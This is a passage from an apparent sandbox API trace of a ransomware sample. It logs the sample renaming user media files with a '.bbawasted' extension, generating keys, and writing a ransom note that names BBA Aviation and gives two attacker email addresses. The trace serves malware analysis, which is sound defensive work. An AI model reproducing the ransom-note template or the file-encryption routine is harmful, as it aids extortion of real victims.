[0204.456] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.456] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.456] lstrcpyW (in: lpString1=0x6aed48, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0204.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hGz18Fu.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\hgz18fu.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hGz18Fu.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\hgz18fu.mkv.bbawasted")) returned 1 [0204.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\hGz18Fu.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\hgz18fu.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0204.458] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0204.458] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xa8e8 [0204.458] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa8e8) returned 0x640000 [0204.458] CloseHandle (hObject=0x288) returned 1 [0204.609] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0204.609] CloseHandle (hObject=0x280) returned 1 [0204.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0204.610] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6ce0) returned 1 [0204.610] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0204.610] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0204.610] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a64e8) returned 1 [0204.611] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0204.611] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0204.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0204.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0204.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.620] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rp2G0I1NGluEUyCMTpou0h12M5MAh79yABtxmXRftz31XQ8Go3ow2YicTTfDmDg1\r\napsaNujAZN7Z1QfteF9gjpQNGev1XxtavSRrh2Zb3CKgDQkR+rljyTJx7pU0CLJo\r\nFqFgcZRSaEctwRZ/1FWkLTXw3Xki0Vp8vd5udKVLSp3mR56klDbnp8p19iX8yDQX\r\nZ+ciyj4eYKCoTT9Sl1CsBoMiWn0lp2itdR7p+8nbxDqoi1+9yiHWaiZllpoCu3b0\r\nzjkXs/WJxaOXQTpBaIHPvnaMpGcsen/oy1UU4MZ9YWU3vJg9YPhAF/V44piV9V+/\r\nZ416zhM3LcrN0af73EXKvIs4Nmh5yYkOiJnhfgR1djnv2ieNhPywA23zI4SmDUPx\r\nZ28tN2REY7BsWyKyIgd3xPaVoZzXUro3Lyl4tTdF3E92+TXcSMTLPY6UA2jRDgDS\r\nsK4lVQsCduV9pji3SdWZGUamE4OqEzKRwIOSx757Yw7uUoKyFHaGXYvDc0I3NL0H\r\nbIOMOJ4nhtcPcHaY8H3x61lxZupSoqchlpCVBEpn+nTg2vL3vfy5lPUIxEdmGoos\r\nB9Qhxwzr1MRWPGv0HFmknHzq4StvglnlSwvYJ3o62ZU4IO+l3pAYOmu44mFthRmv\r\noK/JDkOfRKj0cQ61sIhkgEgnkJjd1dsSM+VmdjZs/6x=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0204.621] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0204.621] SetEndOfFile (hFile=0x27c) returned 1 [0204.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.623] CloseHandle (hObject=0x27c) returned 1 [0204.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0204.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af0b8 | out: hHeap=0x660000) returned 1 [0204.797] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6928) returned 1 [0204.797] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0204.797] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0204.797] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\lTa-CKjc0uMl6C03pW.swf") returned 55 [0204.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6aecf0 [0204.798] lstrcpyW (in: lpString1=0x6aed5e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0204.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.798] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f98) returned 1 [0204.798] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0204.798] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0204.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\lTa-CKjc0uMl6C03pW.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\lta-ckjc0uml6c03pw.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0204.799] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0204.800] SetEndOfFile (hFile=0x27c) returned 1 [0204.800] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.800] lstrcpyW (in: lpString1=0x6aed5e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0204.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\lTa-CKjc0uMl6C03pW.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\lta-ckjc0uml6c03pw.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\lTa-CKjc0uMl6C03pW.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\lta-ckjc0uml6c03pw.swf.bbawasted")) returned 1 [0204.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\lTa-CKjc0uMl6C03pW.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\lta-ckjc0uml6c03pw.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0204.801] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0204.801] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xe3ae [0204.801] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe3ae) returned 0x650000 [0204.801] CloseHandle (hObject=0x28c) returned 1 [0204.813] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0204.814] CloseHandle (hObject=0x294) returned 1 [0204.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0204.814] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6350) returned 1 [0204.815] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0204.815] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0204.815] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0204.816] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0204.816] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0204.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0204.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0204.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0204.826] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Y3MZTRKpSi3uiwJ5gU1M6TqcOGLrkoX8X20nM471sQcDRmI/Ko29iRBLXVCiJ84V\r\nit+0+D2UYpmiXHGeEjydnkdMygaN+vS5SdaEoo8uTR33AXgOciLfiNgdC/JBnSsB\r\naBym3a9kyKxbcVsTWxrwBXdS/bwA/7tHnceIsQWrqwDy/cuqz3N7o+yQXExaQQE9\r\nagZxOxXYUZfz4/BUJu7YMDv7Klqzal7dHyUkpWzeNwWS8ozQlSK2R0uyiVFu00vp\r\nxOHb7WyGu1jP6b5iUZ9xG9qPduNu8gHQLdABrwMwAssOKLbnivHiVyfWkWTL7Uad\r\nfUnOHfaSq8kk+ljA/YsYZ3VUvdNUSdwm50ekRPkZwTmQie28C7UVVQ4RNxDfOech\r\n48IAPEP7zK0+AMQl1VN7CP1X+twEEDPss8UHVEGUdrcSvHKxJZOkSUEdJo2jLJRV\r\nWoqFnMgw4Hg926+FcUMGzZ0m21wo/j14u/i4uQyFeKFOei/kcqpPxt+AIhwzPJ0Q\r\npUjGkVIsZzDBVQu5ZjsQWmgrY7AwQIkQGK/IgKVnReEURYF8TeDTM5lCQD1iNgtu\r\nf+GOYWh2K6Hw5uD9bgiu1LI7+UfpgKfks7EKQzilSVjnaMx6dLs/e8hxXbnfdw80\r\n/v97Kfa1d+b7Mi15i6WHit+7Xx1043iBI/Z6OE+V6DS=[end_key]\r\nKEEP IT\r\n") returned 984 [0204.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0204.827] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0204.827] SetEndOfFile (hFile=0x27c) returned 1 [0204.830] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0204.830] CloseHandle (hObject=0x27c) returned 1 [0205.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.055] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0d58 | out: hHeap=0x660000) returned 1 [0205.055] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f10) returned 1 [0205.056] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0205.056] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0205.056] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\rKE-.m4a") returned 41 [0205.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x6c4b88 [0205.056] lstrcpyW (in: lpString1=0x6c4bda, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.056] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0205.057] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0205.057] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0205.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\rKE-.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\rke-.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0205.058] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.059] SetEndOfFile (hFile=0x280) returned 1 [0205.059] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.059] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.059] lstrcpyW (in: lpString1=0x6c4bda, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\rKE-.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\rke-.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\rKE-.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\rke-.m4a.bbawasted")) returned 1 [0205.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\rKE-.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\rke-.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0205.060] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0205.060] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1626a [0205.060] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1626a) returned 0x640000 [0205.060] CloseHandle (hObject=0x290) returned 1 [0205.067] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.068] CloseHandle (hObject=0x288) returned 1 [0205.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0205.068] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6240) returned 1 [0205.069] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0205.069] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0205.069] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6130) returned 1 [0205.069] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0205.069] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0205.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0205.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0205.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.100] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]pL3PKfvxo7g5fgbokEf8IEXgcjcm6rX8Qszvx6kf2nk0sIF8NAql/CT0fujifE6V\r\nDQaNWQzfmiMR+iRg5tmIGERi/2Xlu6SzoEUZlEz5m+p7M2kmyQdRlgOTHu14HDpy\r\ncEjDDGCA9QzXK/vlwm/l1PClMPcnfdCLbLu0y83zBHWVdPcBQuKUCmOvpcE6LQyo\r\nUQKurEQUYFLehCD0Ahg1dj8IMZWi8ExPiNUGmxWIoT1+koAvViLylkaF+SN1C1wl\r\nY/3nOGtmjjHhJ+dHS27sUi+uoTcBw81MRwqyLYbi6Nf/NF+BFJpHnlo0HM6jdEQy\r\nMU6qI7xJkZClkXaRnTW3No7gRouL63P4fmkkAipnKXSZnlt66ZmRYfx5AT9yt9Yo\r\n3ofXVgaofPs184w/z+IQ/tJZCwyFORqspJo6j99yEotX07IAgOmTYMAqDGQEBuqs\r\nZaWXfGQcYZYsUs49BvZ752h7eDdJGWPCPlfFyK20/3f1Apy6y3GleQtAf8jAixim\r\nR+lSBG5VI51AIfmmq0xyscd7K1illHtDe+kYyf87JjOW1z0GLvKhj8tlY+rwL8RQ\r\nJwG+jBOIZxQEZq3bcs8xullBaRTcQHirclyPFG66LEji01hmO+wK8ZSGPwgzmXvR\r\nds34AhM3PYpKC2j+4NLU4ouiTIte1LMgRMCsFFIlpgs=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.100] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0205.100] SetEndOfFile (hFile=0x280) returned 1 [0205.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.103] CloseHandle (hObject=0x280) returned 1 [0205.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0205.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4568 | out: hHeap=0x660000) returned 1 [0205.105] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0205.105] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0205.105] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0205.105] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\VUUkPFg8xjIiC_14bXH.mkv") returned 56 [0205.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0205.106] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.106] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a60a8) returned 1 [0205.106] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0205.106] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0205.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\VUUkPFg8xjIiC_14bXH.mkv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\vuukpfg8xjiic_14bxh.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0205.107] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.108] SetEndOfFile (hFile=0x280) returned 1 [0205.108] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.108] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\VUUkPFg8xjIiC_14bXH.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\vuukpfg8xjiic_14bxh.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\VUUkPFg8xjIiC_14bXH.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\vuukpfg8xjiic_14bxh.mkv.bbawasted")) returned 1 [0205.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8idk\\VUUkPFg8xjIiC_14bXH.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\8idk\\vuukpfg8xjiic_14bxh.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0205.109] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0205.110] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x9c16 [0205.110] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9c16) returned 0x640000 [0205.110] CloseHandle (hObject=0x288) returned 1 [0205.114] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.114] CloseHandle (hObject=0x290) returned 1 [0205.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0205.114] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6818) returned 1 [0205.115] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0205.115] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0205.115] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: 